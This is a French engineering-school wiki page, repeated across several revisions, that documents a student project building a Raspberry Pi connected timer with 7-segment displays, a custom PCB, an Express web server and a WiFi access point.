- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finaliser le programme de la Raspberry et installer les librairies qui permettent d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est crée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en Entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initial et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parser en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoie et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieurs à 99 secondes en minutes et celle inférieurs à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]<br />
<br />
=Documents rendus=</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49611P4 IOT 20182019-01-26T18:19:57Z<p>Mcreteur : /* Serveur web */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finaliser le programme de la Raspberry et installer les librairies qui permettent d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est crée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en Entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initial et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parser en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoie et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieurs à 99 secondes en minutes et celle inférieurs à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49610P4 IOT 20182019-01-26T18:19:20Z<p>Mcreteur : /* programme Raspberry */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
